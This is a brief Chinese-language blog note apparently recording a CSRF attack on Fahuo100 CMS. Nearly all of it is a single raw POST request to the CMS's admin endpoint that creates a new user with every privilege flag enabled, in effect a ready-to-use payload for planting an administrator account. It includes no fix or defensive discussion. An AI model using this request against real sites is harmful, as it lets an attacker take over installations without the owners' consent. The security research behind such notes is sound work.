【笔记】发货100CMS的CSRF跨站请求伪造 发表于 2024-05-13 更新于 2025-12-19 阅读次数: 前言发货100CMS的CSRF跨站请求伪造 添加用户request1234POST http://127.0.0.1:80/admin/admin.php?action=addContent-Type: application/x-www-form-urlencodedA_login="用户名"&A_pwd="密码"&A_head="nopic.png"&A0_0="1"&A1_0=""&A1_1="1"&A1_2="1"&A1_3="1"&A1_4="1"&A1_5="1"&A2_0="1"&A2_1="1"&A2_2="1" 完成参考文献哔哩哔哩——xiaodisec